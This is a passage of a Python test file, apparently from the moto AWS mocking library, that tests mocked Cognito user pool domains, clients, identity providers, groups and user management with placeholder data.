str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.describe_user_pool_domain(Domain=domain) result["DomainDescription"]["Domain"].should.equal(domain) result["DomainDescription"]["UserPoolId"].should.equal(user_pool_id) result["DomainDescription"]["AWSAccountId"].should_not.be.none @mock_cognitoidp def test_delete_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.delete_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result = conn.describe_user_pool_domain(Domain=domain) # This is a surprising behavior of the real service: describing a missing domain comes # back with status 200 and a DomainDescription of {} result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["DomainDescription"].keys().should.have.length_of(0) @mock_cognitoidp def test_update_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) custom_domain_config = { "CertificateArn": "arn:aws:acm:us-east-1:{}:certificate/123456789012".format( ACCOUNT_ID ) } user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.update_user_pool_domain( UserPoolId=user_pool_id, Domain=domain, CustomDomainConfig=custom_domain_config ) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should.equal("e2c343b3293ee505.cloudfront.net") @mock_cognitoidp def test_create_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, CallbackURLs=[value] ) result["UserPoolClient"]["UserPoolId"].should.equal(user_pool_id) bool(re.match(r"^[0-9a-z]{26}$", result["UserPoolClient"]["ClientId"])).should.be.ok result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"].should_not.have.key("ClientSecret") result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_create_user_pool_client_returns_secret(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, GenerateSecret=True, CallbackURLs=[value], ) result["UserPoolClient"]["UserPoolId"].should.equal(user_pool_id) bool(re.match(r"^[0-9a-z]{26}$", result["UserPoolClient"]["ClientId"])).should.be.ok result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"]["ClientSecret"].should_not.be.none result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_list_user_pool_clients(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) result = conn.list_user_pool_clients(UserPoolId=user_pool_id, MaxResults=10) result["UserPoolClients"].should.have.length_of(1) result["UserPoolClients"][0]["ClientName"].should.equal(client_name) @mock_cognitoidp def test_list_user_pool_clients_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_user_pool_clients_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results, NextToken=next_token ) result_2["UserPoolClients"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_user_pool_clients_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = client_count + 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(client_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, CallbackURLs=[value] ) result = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"] ) result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_update_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") old_client_name = str(uuid.uuid4()) new_client_name = str(uuid.uuid4()) old_value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=old_client_name, CallbackURLs=[old_value] ) result = conn.update_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ClientName=new_client_name, CallbackURLs=[new_value], ) result["UserPoolClient"]["ClientName"].should.equal(new_client_name) result["UserPoolClient"].should_not.have.key("ClientSecret") result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(new_value) @mock_cognitoidp def test_update_user_pool_client_returns_secret(): conn = boto3.client("cognito-idp", "us-west-2") old_client_name = str(uuid.uuid4()) new_client_name = str(uuid.uuid4()) old_value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=old_client_name, GenerateSecret=True, CallbackURLs=[old_value], ) client_secret = client_details["UserPoolClient"]["ClientSecret"] result = conn.update_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ClientName=new_client_name, CallbackURLs=[new_value], ) result["UserPoolClient"]["ClientName"].should.equal(new_client_name) result["UserPoolClient"]["ClientSecret"].should.equal(client_secret) result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(new_value) @mock_cognitoidp def test_delete_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) ) conn.delete_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"] ) caught = False try: conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ) except conn.exceptions.ResourceNotFoundException: caught = True caught.should.be.true @mock_cognitoidp def test_create_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(value) @mock_cognitoidp def test_list_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) result = conn.list_identity_providers(UserPoolId=user_pool_id, MaxResults=10) result["Providers"].should.have.length_of(1) result["Providers"][0]["ProviderName"].should.equal(provider_name) result["Providers"][0]["ProviderType"].should.equal(provider_type) @mock_cognitoidp def test_list_identity_providers_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_identity_providers_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results, NextToken=next_token ) result_2["Providers"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_identity_providers_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = identity_provider_count + 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(identity_provider_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result = conn.describe_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(value) @mock_cognitoidp def test_update_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result = conn.update_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderDetails={"thing": new_value}, ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(new_value) @mock_cognitoidp def test_update_identity_provider_no_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") new_value = str(uuid.uuid4()) with pytest.raises(conn.exceptions.ResourceNotFoundException) as cm: conn.update_identity_provider( UserPoolId="foo", ProviderName="bar", ProviderDetails={"thing": new_value} ) cm.value.operation_name.should.equal("UpdateIdentityProvider") cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_update_identity_provider_no_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.ResourceNotFoundException) as cm: conn.update_identity_provider( UserPoolId=user_pool_id, ProviderName="foo", ProviderDetails={"thing": new_value}, ) cm.value.operation_name.should.equal("UpdateIdentityProvider") cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_delete_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) conn.delete_identity_provider(UserPoolId=user_pool_id, ProviderName=provider_name) caught = False try: conn.describe_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name ) except conn.exceptions.ResourceNotFoundException: caught = True caught.should.be.true @mock_cognitoidp def test_create_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) description = str(uuid.uuid4()) role_arn = "arn:aws:iam:::role/my-iam-role" precedence = random.randint(0, 100000) result = conn.create_group( GroupName=group_name, UserPoolId=user_pool_id, Description=description, RoleArn=role_arn, Precedence=precedence, ) result["Group"]["GroupName"].should.equal(group_name) result["Group"]["UserPoolId"].should.equal(user_pool_id) result["Group"]["Description"].should.equal(description) result["Group"]["RoleArn"].should.equal(role_arn) result["Group"]["Precedence"].should.equal(precedence) result["Group"]["LastModifiedDate"].should.be.a("datetime.datetime") result["Group"]["CreationDate"].should.be.a("datetime.datetime") @mock_cognitoidp def test_create_group_with_duplicate_name_raises_error(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) with pytest.raises(ClientError) as cm: conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) cm.value.operation_name.should.equal("CreateGroup") cm.value.response["Error"]["Code"].should.equal("GroupExistsException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_get_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.get_group(GroupName=group_name, UserPoolId=user_pool_id) result["Group"]["GroupName"].should.equal(group_name) result["Group"]["UserPoolId"].should.equal(user_pool_id) result["Group"]["LastModifiedDate"].should.be.a("datetime.datetime") result["Group"]["CreationDate"].should.be.a("datetime.datetime") @mock_cognitoidp def test_list_groups(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.list_groups(UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_delete_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.delete_group(GroupName=group_name, UserPoolId=user_pool_id) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected with pytest.raises(ClientError) as cm: conn.get_group(GroupName=group_name, UserPoolId=user_pool_id) cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") @mock_cognitoidp def test_admin_add_user_to_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected @mock_cognitoidp def test_admin_add_user_to_group_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) result = conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected @mock_cognitoidp def test_admin_add_user_to_group_again_is_noop(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) # should there be an assertion here? @mock_cognitoidp def test_list_users_in_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username) @mock_cognitoidp def test_list_users_in_group_ignores_deleted_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) username2 = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username2) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username2, GroupName=group_name ) conn.admin_delete_user(UserPoolId=user_pool_id, Username=username) result = conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name) result["Users"].should.have.length_of(1) result["Users"][0]["Username"].should.equal(username2) @mock_cognitoidp def test_admin_list_groups_for_user(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_admin_list_groups_for_user_with_username_attribute(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name) @mock_cognitoidp def test_admin_list_groups_for_user_ignores_deleted_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) group_name2 = str(uuid.uuid4()) conn.create_group(GroupName=group_name2, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name2 ) conn.delete_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id) result["Groups"].should.have.length_of(1) result["Groups"][0]["GroupName"].should.equal(group_name2) @mock_cognitoidp def test_admin_remove_user_from_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_remove_user_from_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name)[ "Users" ].should.have.length_of(0) conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id)[ "Groups" ].should.have.length_of(0) @mock_cognitoidp def test_admin_remove_user_from_group_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = "test@example.com" conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) result = conn.admin_remove_user_from_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) list(result.keys()).should.equal(["ResponseMetadata"]) # No response expected conn.list_users_in_group(UserPoolId=user_pool_id, GroupName=group_name)[ "Users" ].should.have.length_of(0) conn.admin_list_groups_for_user(Username=username, UserPoolId=user_pool_id)[ "Groups" ].should.have.length_of(0) @mock_cognitoidp def test_admin_remove_user_from_group_again_is_noop(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) username = str(uuid.uuid4()) conn.admin_create_user(UserPoolId=user_pool_id, Username=username) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) conn.admin_add_user_to_group( UserPoolId=user_pool_id, Username=username, GroupName=group_name ) @mock_cognitoidp def test_admin_create_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result["User"]["Username"].should.equal(username) result["User"]["UserStatus"].should.equal("FORCE_CHANGE_PASSWORD") result["User"]["Attributes"].should.have.length_of(2) def _verify_attribute(name, v): attr = [a for a in result["User"]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) result["User"]["Enabled"].should.equal(True) @mock_cognitoidp def test_admin_create_user_with_username_attributes(): conn = boto3.client("cognito-idp", "us-west-2") username = "test@example.com" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] result = conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) result["User"]["Username"].should_not.equal(username) result["User"]["UserStatus"].should.equal("FORCE_CHANGE_PASSWORD") result["User"]["Attributes"].should.have.length_of(3) def _verify_attribute(name, v): attr = [a for a in result["User"]["Attributes"] if a["Name"] == name] attr.should.have.length_of(1) attr[0]["Value"].should.equal(v) _verify_attribute("thing", value) _verify_attribute("email", username) result["User"]["Enabled"].should.equal(True) @mock_cognitoidp def test_admin_create_user_with_incorrect_username_attribute_type_fails(): conn = boto3.client("cognito-idp", "us-west-2") value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as ex: username = str(uuid.uuid4()) conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) err = ex.value.response["Error"] err["Code"].should.equal("InvalidParameterException") err["Message"].should.equal("Username should be either an email or a phone number.") @mock_cognitoidp def test_admin_create_user_with_existing_username_attribute_fails(): conn = boto3.client("cognito-idp", "us-west-2") value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), UsernameAttributes=["email"] )["UserPool"]["Id"] username = "test@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) with pytest.raises(ClientError) as ex: username = "test@example.com" conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) err = ex.value.response["Error"] err["Code"].should.equal("UsernameExistsException") err["Message"].should.equal("test@example.com") @mock_cognitoidp def test_admin_create_existing_user(): conn = boto3.client("cognito-idp", "us-west-2") username = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) caught = False try: conn.admin_create_user( UserPoolId=user_pool_id, Username=username, UserAttributes=[{"Name": "thing", "Value": value}], ) except conn.exceptions.UsernameExistsException: caught = True caught.should.be.true @mock_cognitoidp def test_admin_confirm_sign_up(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) password = "Passw0rd!" user_pool_id = conn.create_user_pool( PoolName="us-east-1_aaaaaaaa", AutoVerifiedAttributes=["email"] )["UserPool"]["Id"] client_id = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()), GenerateSecret=False )["UserPoolClient"]["ClientId"] conn.sign_up(ClientId=client_id, Username=username, Password=password) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username) user["UserStatus"].should.equal("UNCONFIRMED") conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=username) user = conn.admin_get_user(UserPoolId=user_pool_id, Username=username,) user["UserStatus"].should.equal("CONFIRMED") @mock_cognitoidp def test_admin_confirm_sign_up_non_existing_user(): conn = boto3.client("cognito-idp", "us-east-1") username = str(uuid.uuid4()) user_pool_id = conn.create_user_pool( PoolName="us-east-1_aaaaaaaa", AutoVerifiedAttributes=["email"] )["UserPool"]["Id"] with pytest.raises(ClientError) as exc: conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=username) err = exc.value.response["Error"] err["Code"].should.equal("UserNotFoundException") err["Message"].should.equal(f"User does not exist.") @mock_cognitoidp def test_admin_confirm_sign_up_non_existing_pool(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_aaaaaaaa" with pytest.raises(ClientError) as exc: conn.admin_confirm_sign_up(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) err = 